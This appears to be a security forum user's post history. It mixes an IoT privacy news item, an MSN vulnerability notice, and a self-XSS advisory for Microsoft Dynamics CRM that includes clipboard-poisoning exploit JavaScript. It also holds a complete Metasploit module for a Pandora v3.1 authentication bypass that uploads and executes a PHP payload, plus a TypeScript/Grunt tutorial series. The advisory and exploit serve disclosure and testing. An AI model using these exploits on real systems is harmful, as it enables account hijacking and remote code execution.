-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
A "deeply personal" picture of every consumer could be grabbed by futuristic smart gadgets, the chair of the US Federal Trade Commission has warned. Speaking at CES, Edith Ramirez said a future full of smart gadgets that watch what we do posed a threat to privacy. The collated data could create a false impression if given to employers, universities or companies, she said. Ms Ramirez urged tech firms to make sure gadgets gathered the minimum data needed to fulfil their function. Losing respect The internet of things (IoT), which will populate homes, cars and bodies with devices that use sophisticated sensors to monitor people, could easily build up a "deeply personal and startlingly complete picture" of a person's lifestyle, said Ms Ramirez. The data picture would include details about an individuals credit history, health, religious preferences, family, friends and a host of other indicators, she said. The granularity of the data that could be gathered by existing devices was without precedent, she said, and likely to get more detailed as time went on. An individual's preference for reality TV or the History Channel could be tracked by tablets or smart TV sets and then shared with other organisations in a way that could prove damaging, she said. "Will this information be used to paint a picture of you that you won't see but that others will?" she asked, wondering if it would influence the types of services people were offered, ads they were shown or what assumptions firms made about their lifestyle. The FTC boss acknowledged that the IoT had the potential to improve health and boost economic growth, but said this should not come at the expense of individual privacy. "I question the notion that we must put sensitive consumer data at risk on the off-chance a company might someday discover a valuable use for the information," she said. Data should only be gathered for a specific purpose, said Ms Ramirez, adding that any firm that did not respect privacy would lose the trust of potential customers. Source
-
Web Application Security Notification Services Affected: msn Type: Web Application Vulnerabilities MSRC Reference: [21027cl] Threat Level: High Severity: High CVSS Severity Score: 7.8 Impact Type: Complete confidentiality, integrity and availability violation. Vulnerability: Filtration Bypass. Authenticated/Unauthenticated Cross-Site Scripting. Resource access via Uniform Resource Identifier (URI) scheme abuse. [2] Command and parameter injections on local software. Vendor Overview Microsoft Corporation is an American multinational corporation headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics and personal computers and services. Its best known software products are the Microsoft Windows line of operating systems, Microsoft Office suite, and Internet explorer web-browser. Microsoft is the number one vendor and world’s largest vendor by revenue. Microsoft was founded by Bill Gates and Paul Allen in 1975. Service Overview MSN (Originally the Microsoft Network) is a collection of Internet websites and services provided by Microsoft Corporation. The new re-launched service as of 2014, features 12 sections consisting of weather, news, sports, money, health & fitness, food and drink, travel, autos, video, entertainment and lifestyle. The top of the homepage provides access to popular sites like Outlook.com, Facebook, Twitter, OneNote , OneDrive and Skype. It is pertinent to note that, msn has more than 415 million visitors worldwide, every month. [4] Read More : HERE
-
Advisory ID: HTB23245 Product: Microsoft Dynamics CRM 2013 SP1 Vendor: Microsoft Corporation Vulnerable Version(s): (6.1.1.132) (DB 6.1.1.132) and probably prior Tested Version: (6.1.1.132) (DB 6.1.1.132) Advisory Publication: December 29, 2014 [without technical details] Vendor Notification: December 29, 2014 Public Disclosure: January 7, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered a DOM-based self-XSS vulnerability in Microsoft Dynamics CRM 2013 SP1, which can be exploited to perform Cross-Site Scripting attacks against authenticated users. The vulnerability exists due to insufficient filtration of user-supplied input passed to the "/Biz/Users/AddUsers/SelectUsersPage.aspx" script after an unsuccessful attempt to send XML SOAP request. A remote attacker can trick a logged-in user to insert malicious HTML and script code into the "newUsers_ledit" input field and execute it in user’s browser in context of vulnerable web application. To successfully exploit this vulnerability (as any other XSS vulnerability, besides stored ones) an attacker should use a social engineering technique to trick the user to insert malicious code into the above-mentioned field on the vulnerable page. Being a self-XSS, the vulnerability still remains quite useful to perform attacks against users of Microsoft Dynamics CRM that is quite secure. Below you can find the exploitation scenario applicable to any web application running Microsoft Dynamics CRM. Using pretty simple social engineering technique attacker can trick a user to copy some "legitimate" text from a specially prepared malicious page to user's clipboard using "Ctrl+C" or mouse, and then paste it into the vulnerable web page. Simple exploit code bellow will display a legitimate text to the user, and then replace the text in user's clipboard with our exploit code: <script> // simple exploit to poison clipboard function replaceBuffer() { var selection = window.getSelection(), eviltext = '1<img src=x onerror=alert("ImmuniWeb") />', copytext = eviltext, newdiv = document.createElement('div'); newdiv.style.position = 'absolute'; newdiv.style.left = '-99999px'; document.body.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function () { document.body.removeChild(newdiv); }, 100); } document.addEventListener('copy', replaceBuffer); </script> In order to find hidden users just copy this string into the search window: HIDDEN USERS&&DISPLAY The victim will see the following text in the browser: HIDDEN USERS&&DISPLAY However, will copy and paste the following malicious payload: 1<img src=x onerror=alert("ImmuniWeb")> Attacker then can trick then the user to paste copied buffer into the "newUsers_ledit" field on the "https://[victim_host]/[site]/Biz/Users/AddUsers/SelectUsersPage.aspx" page and the JS code will be executed in context of the vulnerable website. Below you can see the image with user cookies displayed in JS pop-up: https://www.htbridge.com/advisory/HTB23245.png Quick video of exploitation: http://www.youtube.com/watch?v=yS-eS_qWgUI ----------------------------------------------------------------------------------------------- Solution: On the 31st of December 2014, Microsoft replied the following: "MSRC does not consider self-XSS issues to be security vulnerabilities. For a discussion of how we define security vulnerabilities, see http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx " Taking into consideration the rise of successful self-XSS attacks campaigns in 2014 we do consider this issue to be a security vulnerability. As vendor refused to provide an official fix for the vulnerability, we suggest to block access to the vulnerable script using WAF or web server configuration as a temporary solution. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23245 - https://www.htbridge.com/advisory/HTB23245 - Self-XSS in Microsoft Dynamics CRM 2013 SP1. [2] Microsoft Dynamics CRM 2013 - http://www.microsoft.com/en-us/dynamics/crm.aspx - Microsoft Dynamics CRM is our customer relationship management (CRM) business solution that drives sales productivity and marketing effectiveness through social insights, business intelligence, and campaign management in the cloud, on-premises, or with a hybrid combination. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
-
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits an authentication bypass vulnerability in Pandora v3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix. }, 'License' => MSF_LICENSE, 'Author' => [ 'Juan Galiana Lara', # Vulnerability discovery 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module '_flood <freshbones[at]gmail.com>', # Metasploit module 'mubix <mubix[at]room362.com>', # Auth bypass and file upload 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload ], 'References' => [ ['CVE', '2010-4279'], ['OSVDB', '69549'], ['BID', '45112'] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Nov 30 2010", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), ], self.class) end def check base = target_uri.path # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'index.php') }) if res and res.code == 200 #Tested on v3.1 Build PC100609 and PC100608 if res.body.include?("v3.1 Build PC10060") return Exploit::CheckCode::Appears elsif res.body.include?("Pandora") return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end # upload a payload using the pandora built-in file upload def upload(base, file, cookies) data = Rex::MIME::Message.new data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"") data.add_part("Go", nil, nil, 'form-data; name="go"') data.add_part("images", nil, nil, 'form-data; name="directory"') data.add_part("1", nil, nil, 'form-data; name="upload_file"') data_post = data.to_s data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'index.php'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'vars_get' => { 'sec' => 'gsetup', 'sec2' => 'godmode/setup/file_manager', }, 'data' => data_post }) register_files_for_cleanup(@fname) return res end def exploit base = target_uri.path @fname = "#{rand_text_numeric(7)}.php" cookies = "" # bypass authentication and get session cookie res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'index.php'), 'vars_get' => { 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', 'loginhash_user' => 'admin', 'loginhash' => '1', }, }) # fix if logic if res and res.code == 200 if res.body.include?("Logout") cookies = res.get_cookies print_status("Login Bypass Successful") print_status("cookie monster = " + cookies) else fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed") end end # upload PHP payload to images/[fname] print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code == 200 print_good("#{peer} - File uploaded successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload print_status("#{peer} - Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'images', "#{@fname}") }, 1) rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed") end end end Source
-
Bun articol dar a mai fost postat https://rstforums.com/forum/95033-hacking-tor-network-follow-up.rst?highlight=Hacking+Tor+Network%3A+Follow Foloseste si tu functia de "Search" inainte de a posta ceva.
-
In Part I we setup basic project and prepared output package for mobile device. This got us some benefits coming from statically typed system provided by Typescript, dependency loading and given us some automation in building and possible integration with Continuous Integration systems. In Part II we layed out infrastructure for easy maintenance of large projects with Jade, Stylus and Q/A tools. This part will cover bootstraping of Require.js application of data binding for applications, namely MVC and MVVC pattern with Knockout.js. Bootstraping In order to effectively use AMD system from Require.js library have to expose it's components via export keyword instead of providing global variables. Although this is becoming standard way how to distribute JS libraries there are still libraries that does it in old way and that might confuse Require.js. To be able to use such libraries we can bootstrap our application by using shims. In this part we will be using Zepto.js (lightweight counterpart to jQuery) and Knockout.js which both exposes global objects - in case of Zepto it's $ like in jQuery and in case of Knockout it's knockout. We will continue in project from last time where add minified zepto.min.js and knockout-2.3.0.js into lib folder. Now we need to tell Require.js where to look for those files; this can be easily achieved by using shim functionality and defining configuration file: requirejs.config({ paths: { "zepto": "libs/zepto.min", "knockout": "libs/knockout-2.3.0" }, shim: { zepto: { exports: "$" } } }); Please note that we are not providing .js extension in paths section. Since we will be using those libraries across the project this configuration needs to occur before first module tries to load it up. This brings interesting chicken-and-egg problem since Typescript generates declare statements as first lines in the file so if we try to put this configuration into Typescript file and load e.g. application.ts which in turn uses Zepto it will fail since at the moment of loading configuration was not yet processed. There are two ways out of this problem - one is to write config.js in pure Javascript and do imports in correct places or use mixed approach. In this example we will use latter one where we benefit from fact that Javascript code is fully valid in Typescript files. We will update src/config.ts to following: /// <reference path='../extern/require.d.ts'/> "use strict"; requirejs.config({ paths: { "zepto": "zepto.min", "knockout": "knockout-2.3.0" }, shim: { zepto: { exports: "$" } } }); // Stage one require(['zepto', 'knockout'], (zepto, knockout) => { // Stage two require(['main'], main => { new main.Main().run(); }); }); As you can see we are loading dependencies in two stages - reason for that is that Require.js is practicing lazy loading but in this special case we want to have all those libraries pre-loaded before continuing. Other thing that is worth noticing is that we are referencing .d.ts files in header - without this information Typescript will not know about Require.js objects and functions. We can obtain this file from e.g. DefinitelyTyped site and put: require.d.ts files into /extern/require.d.ts zepto.d.ts into /extern/zepto.d.ts (we will use this one later) knockout.d.ts into /extern/knockout.d.ts (we will use this one later) knockout.amd.d.ts into /extern/knockout.amd.d.ts (we will use this one later - this one is AMD wrapper around standard Knockout) Those files stands for Definition TypeScript - they contain only definitions of objects not real implementation. You can find more information about this in Typescript Language Reference. Note: Typescript recently got support for generics and some libraries are already using this concept; previous package.json was pointed to older version of Typescript so it should be updated (line 14) to: "grunt-typescript": "0.2.1", Last piece of change we need to do is to tell Grunt to copy all libraries from lib folder; change line 19 in Gruntfile.js to: { flatten: true, expand: true, src: ['lib/*.js'], dest: 'dist/www/js/'} With all infrastructure in place we can start using all libraries as usual with all benefits of Typescript and lazy-loading. Quick example could be updating src/main.ts to following: /// <reference path='../extern/zepto.d.ts'/> var $ = require("zepto"); export class Main { constructor() { console.log("main.init()"); $(".corpus").click(() => { alert("hello world!"); })); } run() { console.log("main.run()"); } } Which should display message box with message "hello world" after clicking on text in browser. Knockout.js So far it was more about talking on laying out infrastructure rather than doing real work. In this chapter we take a look on how to utilize all of the components we setup so far and we will build simple menu for us. First, let's introduce Knockout.js library; it's Model-View-ViewModel pattern based binding library which will be familiar to Windows Phone developers. For those unaware of concept I recommend try try live examples on Knockout web pages but in our case we will split functionality as follows: Model - simple JSON files with data to be displayed View - HTML page generated from Jade and CSS styles from Stylus ViewModel - Typescript compiled into Javascript binding view to model and acting on events Let's start with Model - we create new file src/menuModel.ts which will contain items that we wish to display: export interface MenuItem { name: string; icon: string; id: number; }; export var items: MenuItem[] = [ { id: 0, name: "Home", icon: "home.png" }, { id: 1, name: "Items", icon: "items.png" }, { id: 2, name: "Settings", icon: "settings.png" } ]; File defines interface on data displayed in menu and menu items itself - this information can also come e.g. from AJAX call. Now to prepare ViewModel which will establish data relation between View and Model. We will update src/main.ts to following: /// <reference path='../extern/knockout.amd.d.ts'/> var $ = require("zepto"); import menuModel = module("./menuModel"); import ko = module("knockout"); export class Main { menuItems: KnockoutObservableArray<menuModel.MenuItem>; constructor() { console.log("main.init()"); this.menuItems = ko.observableArray(menuModel.items); } run() { console.log("main.run()"); ko.applyBindings(this); } } Here we prepare observable array of our menu items for Knockout.js and we will bind this as main object. This is everything we need to do for display purposes - Knockout will handle everything else for us. Last part is preparing View - since we most probably will be using same menu on multiple pages we will extract all relevant definition into new file views\menu.jade: ul.menu(data-bind="foreach: menuItems") li(data-bind="text: name") First line created UL element which will be bound to property named menuItems; since we are using foreach keyword it is expected that this property will be Array. Everything that is declared within this element will be copied as many times as is count of items in collection. Second line says it should be LI element and text should be bound to property name of every item of collection menuItems. Since we want to create separate HTML files not one big one we need to update Gruntfile.js lines 45-47: files: [ { expand: true, ext: ".html", cwd: "views/", src: ['*.jade'], dest: 'dist/www/' } ] Last bit of functionality is to include menu into our index view - we will update views/index.jade: html head link(rel='stylesheet', href='css/index.css') script(data-main='js/config', src='js/require.js') body include menu.jade .corpus Hello, world! That was easy, wasn't it? Unfortunately this doesn't look too much like menu so we extend this example bit more; let's style it into more conventional way (styles/index.styl): body font: 100% "Trebuchet MS", sans-serif .canvas margin: 8px .menu list-style-type none padding 0px margin 0px .menu li width 64px height 64px display inline-block margin 0 2px .menu .selected font-weight bold So we would like to make menu item bold when it's selected; in order to achieve this we first need to know which menu item is selected. This should be extracted to menu component (e.g. src/menu.ts) but for sake of simplicity we put it into src/main.ts: // <reference path='../extern/knockout.amd.d.ts'/> var $ = require("zepto"); import menuModel = module("./menuModel"); import ko = module("knockout"); export class Main { menuItems: KnockoutObservableArray<menuModel.MenuItem>; selectedMenu: KnockoutObservable<number>; constructor() { console.log("main.init()"); this.menuItems = ko.observableArray(menuModel.items); this.selectedMenu = ko.observable(menuModel.items[0].id); } run() { console.log("main.run()"); ko.applyBindings(this); } selectMenu(id: number) { this.selectedMenu(id); } } Please note that in order to update value we need to perform function call instead. This is often source of issues. Now we know which menu item is selected and we need to bind this information to UI and propagate this changes back to ViewModel; we will update views/menu.jade to achieve this: ul.menu(data-bind="foreach: menuItems") li(data-bind="text: name, css: { selected: $root.selectedMenu() == id }, event: { click: $root.selectMenu.bind($root, id) }") Again, please note that in order to obtain value we need to perform function call. Object $root in this case contains reference to top-level ViewModel object (in our case instance of class Main). Since Knockout.js processes events on our behalf context of methods called this will be always within Knockout unless we will bind it to correct context (in this case $root). Compile with grunt and enjoy your menu that was built without doing any event handling or CSS operations! As usual you can find zipped archive with complete example here. Source
-
Overview In Part I we setup basic project and prepared output package for mobile device. This got us some benefits coming from statically typed system provided by Typescript, dependency loading and given us some automation in building and possible integration with Continuous Integration systems. This part will cover additional tools that can be used to provide better cooperation with other developers and template engines. We will cover following topics: Templates of view Templates of CSS styles Maintenance Jade - view templates Jade is powerful template engine for HTML pages or snippets that can be controlled via models passed. Traditionally it's more used for web servers to provide base templates however with our setup we can easily reuse this component to prepare mobile web applications and take away some of redundancy coming to play with . To start with we install Jade task for Grunt: > npm install grunt-contrib-jade --save-dev Now we can update our existing views/index.html file to views/index.jade file: html head script(data-main='js/config', src='js/require.js') body #corpus Hello, world! And finally update our Gruntfile.js to execute new task: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } }, copy: { libs: { files: [ { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'} ] }, tizen: { files: [ { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'} ] } }, zip: { tizen: { src: 'dist/tizen/*', cwd: 'dist/tizen', dest: 'dist/helloWorld.wgt' } }, jade: { compile: { options: { data: { debug: true } }, files: { "dist/www/index.html": ["views/*.jade"] } } } }); grunt.loadNpmTasks('grunt-typescript'); grunt.loadNpmTasks('grunt-contrib-copy'); grunt.loadNpmTasks('grunt-zip'); grunt.loadNpmTasks('grunt-contrib-jade'); // Default task(s). grunt.registerTask('default', ['copy:libs', 'typescript', 'jade']); grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']); }; This approach has added benefit of simpler structure (no need to use closing tags), better readability and ability to use inheritance, blocks and includes. Stylus - CSS templates Similar approach as for views can be used for CSS by using Stylus; in this case benefit is less obvious but with help of in-line conditioning and functions which can take away some of the maintenance problems. Approach to integrate with our solution is straightforward: > npm install grunt-contrib-stylus --save-dev Put initial style definition into styles/index.styl: body font: 62.5% "Trebuchet MS", sans-serif #canvas margin: 8px Update views/index.jade: html head link(rel='stylesheet', href='css/index.css') script(data-main='js/config', src='js/require.js') body #corpus Hello, world! And finally update Gruntfile.js: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } }, copy: { libs: { files: [ { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'} ] }, tizen: { files: [ { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'}, { flatten: true, expand: true, src: ['dist/www/css/*'], dest: 'dist/tizen/css'} ] } }, zip: { tizen: { src: 'dist/tizen/*', cwd: 'dist/tizen', dest: 'dist/helloWorld.wgt' } }, jade: { compile: { options: { data: { debug: true } }, files: { "dist/www/index.html": ["views/*.jade"] } } }, stylus: { compile: { files: { 'dist/www/css/index.css': 'styles/index.styl' } } } }); grunt.loadNpmTasks('grunt-typescript'); grunt.loadNpmTasks('grunt-contrib-copy'); grunt.loadNpmTasks('grunt-zip'); grunt.loadNpmTasks('grunt-contrib-jade'); grunt.loadNpmTasks('grunt-contrib-stylus'); // Default task(s). grunt.registerTask('default', ['copy:libs', 'typescript', 'jade', 'stylus']); grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']); }; Maintenance Important part of software development process is making sure that everyone in the team starts from same spot and follows same rules and avoid common mistakes. First part of this process can be automated by linting (CSSLint, JSLint, JSHint etc.), unit testing (QUnit), adding clean task and second part can be done by code peer reviews. Let's start by adding some more tasks: > npm install grunt-contrib-csslint grunt-contrib-jshint grunt-contrib-qunit grunt-contrib-clean --save-dev Now let's make clean & lint part of our daily workflow by updating Gruntfile.js: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } }, copy: { libs: { files: [ { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'} ] }, tizen: { files: [ { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'}, { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'}, { flatten: true, expand: true, src: ['dist/www/css/*'], dest: 'dist/tizen/css'} ] } }, zip: { tizen: { src: 'dist/tizen/*', cwd: 'dist/tizen', dest: 'dist/helloWorld.wgt' } }, jade: { compile: { options: { data: { debug: true } }, files: { "dist/www/index.html": ["views/*.jade"] } } }, stylus: { compile: { files: { 'dist/www/css/index.css': 'styles/index.styl' } } }, csslint: { strict: { options: { import: 2 }, src: ['dist/www/css/*.css'] } }, jshint: { files: [ 'dist/www/js/main.js', 'dist/www/js/config.js' ], options: { force: true, // Don't fail hard .. browser: true, devel: true, globals: {define: true}, } }, clean: ['dist'] }); grunt.loadNpmTasks('grunt-typescript'); grunt.loadNpmTasks('grunt-contrib-copy'); grunt.loadNpmTasks('grunt-zip'); grunt.loadNpmTasks('grunt-contrib-jade'); grunt.loadNpmTasks('grunt-contrib-stylus'); grunt.loadNpmTasks('grunt-contrib-csslint'); grunt.loadNpmTasks('grunt-contrib-jshint'); grunt.loadNpmTasks('grunt-contrib-clean'); // Default task(s). grunt.registerTask('default', ['copy:libs', 'typescript', 'jade', 'stylus', 'csslint', 'jshint']); grunt.registerTask('tizen', ['clean', 'default', 'copy:tizen', 'zip:tizen']); }; By running grunt command we will run into couple of issues in both CSS and JS files (bad, bad developer!). Most of those can be easily resolved except for W033 (missing semicolon) which is not generated by Typescript compiler in current version so we turn off hard fail for JS validation. With clean task integrated into tizen target we can ensure that everybod will always receive same build from same source files; clean task can be run also directly to force cleaning of dist directory. Complete project can be downloaded here without node_modules folder so it is necessary to run following command from project directory to load dependencies Source
-
Node Webapp Sample Overview With more and more powerful mobile devices spreading into population we can see that mobile web applications are coming to boom also on mobile devices. This brings in new set of people working in this segment looking into this way of development in new way. Traditionally web applications require desktop computer which is usually by magnitude better than average mobile device; in combination with known issues of web development (scattered platform, Javascript etc.) and the mobile-world limitations like limited available memory and external events like low battery, incoming calls etc. this can lead into quick frustration and dismissing the platform. Webapps definitely have their place in current ecosystems as tool for quick prototyping and showcasing features but looking forward into heavy investments in Tizen, Firefox OS and Ubuntu Mobile promises that in short time frame this can become viable option also for production-quality application. Still, from the nature of tools used in this area it quickly becomes pain to maintain and add new features. One of the major contributor to this fact is that Javascript as main language is designed with other purposes (simplicity, easy learning curve) while more traditional languages like Java, C# or C++ focuses more on larger scale project maintainability. In this article I’ll try to target following issues: Static typing in Javascript Module loading in larger projects Packaging for mobile platform Infrastructure As main tool in this article I’ll be using Node.js and created setup that can be easily deployed to Continuous Integration system of your choice. Choice of Node.js is driven by fact that is server-side Javascript engine which easily integrates with our web app (no need of special XML files etc.) and provides good toolset for web app development. Assuming installed Node.js (current version is v0.10.3) we start by laying down some infrastructure and creating new package in new directory (e.g. helloworld): npm init Now we configure our new project by answering couple of questions (name, version, entry point etc. - defaults are fine) and we will be granted with newly created package.json file which serves as descriptor of our package. Now to install Grunt (current version is v0.4.1) that we will be using to chain our toolset and save us some headaches (and of course create whole set of new ones). We will need to install it globally to get new grunt command by invoking: npm install -g grunt-cli Main driver of Grunt system is Gruntfile.js file that can be created from template or by hand. Since templates are quite complex we will start by very simple Gruntfile that will be extended: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } } }); grunt.loadNpmTasks('grunt-typescript'); grunt.registerTask('default', ['typescript']); }; We still need to install local copy of Grunt + tasks into our project: npm install grunt --save-dev Option --save-dev tells NPM that we will need to have this package only for development - our final codes will don’t need that. And now we should be able to invoke Grunt command from command line to run our builds system: grunt Success! By invoking Grunt without parameters we run default task. Now to prepare some folder structure: dist - all output JS, CSS & HTML pages, platform packages etc. lib - external libraries images - images for our project platform - platform specific files styles - Stylus or CSS styles src - Typescript files views - Jade or HTML pages Typescript Typescript is new kid on the block from Microsoft which aims to help with most critical issues of Javascript for larger projects - module loading, classes & interfaces and static typing. Great thing about Typescript is that it’s superset of JS - this means that every JS file is automatically Typescript and Typescript follows proposed features for ECMAScript 6 which in future should allow Typescript files without need of compilation. For now we still need to compile Typescript into Javascript so we will install new Grunt task npm install grunt-typescript --save-dev Now we need to tell Grunt to load new tasks and tell it how to translate Typescript files into Javascript by updating Gruntfile.js: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } } }); grunt.loadNpmTasks('grunt-typescript'); grunt.registerTask('default', ['typescript']); }; And create our main Typescript file (into src/main.ts): export class Main { constructor() { console.log("main.init()"); } run() { var self = this; console.log("main.run()"); } } Now we can run grunt command again and we should get compiled main.js in dist/www. Reason for adding specific www folder is that it’s usually faster to do first check in desktop browser like Chrome rather than building it for specific platform - this desktop version will be our default target that will be later incorporated into target for building for specific platform. File that we got is build for dynamic module loading via AMD mechanism - unfortunately no current browser supports this so we need to add support for this. Dynamic module loading Usual problem with larger web projects is separation of code modules and code dependencies - in order to keep project maintainable we need to split functionality into multiple JS files, however there is no way to tell that this JS module requires other JS module directly in JS file since this needs to be specified in HTML file by script tag (and usually also in correct order). To resolve this issue script loaders like RequireJS uses AMD format to specify which modules are required for script. Fortunately Typescript can export module dependencies in AMD format as well which makes it suitable for our purposes. We will start by creating src/config.ts (which will serve as main entry point into application and in future will hold also RequireJS shim configuration for external libraries) but for now it will be pretty simple: import main = module("main"); var Main = new main.Main(); Main.run(); This code will import main.ts file, instantiate Main class and runs Main.run() method. Now we need to create sample web page that will demonstrate module loading (views/index.html): <html> <head> <script data-main="js/config" src="js/require.js"> </script> </head> <body> <div id="corpus"> Hello world! </div> </body> </html> Additionaly, we download RequireJS file into libs/require.js and tell Grunt to copy both HTML and JS files into their respective locations. For this we will need contrib-copy task: npm install grunt-contrib-copy --save-dev And update Gruntfile.js: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } }, copy: { libs: { files: [ { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'} ] }, html: { files: [ { flatten: true, expand: true, src: ['views/index.html'], dest: 'dist/www'} ] } }, }); grunt.loadNpmTasks('grunt-typescript'); grunt.loadNpmTasks('grunt-contrib-copy'); // Default task(s). grunt.registerTask('default', ['copy:libs', 'typescript', 'copy:html']); }; We now have 2 subtasks of copy task (libs and html) - this way we can create build steps of same task that can be used for different targets or purposes. By running grunt from command line we should get new structure in dist/www folder and opening dist/www/index.html should write two messages into development console: Packaging for mobile platform In this example we will focus on Tizen platform since it has native support for web applications but with few modifications it’s possible to integrate PhoneGap (Apache Cordova) framework as well and target Android, iOS, Windows Phone and other platforms. Tizen works with HTML5 packaged web app files which is basically zip file with config.xml defining package metadata. We will start by creating this file into platform/tizen: <?xml version="1.0" encoding="UTF-8"?> <widget xmlns="http://www.w3.org/ns/widgets" xmlns:tizen="http://tizen.org/ns/widgets" id="http://org.example/helloWorld" version="1.0" viewmodes="fullscreen"> <icon src="icon.png"/> <content src="index.html"/> <name>helloWorld</name> <tizen:application id="c8ETUJghqu" required_version="1.0"/> </widget> Additionally we will need application icon which will be displayed in main menu (platform/tizen/icon.png): Last bit is zip task for Grunt: npm install grunt-zip --save-dev And we can update Gruntfile.js to pull it together: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), typescript: { base: { src: ['src/**/*.ts'], dest: './dist/www/js', options: { module: 'amd', //or commonjs target: 'es5', //or es3 base_path: 'src' } } }, copy: { libs: { files: [ { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'} ] }, html: { files: [ { flatten: true, expand: true, src: ['views/index.html'], dest: 'dist/www'} ] }, 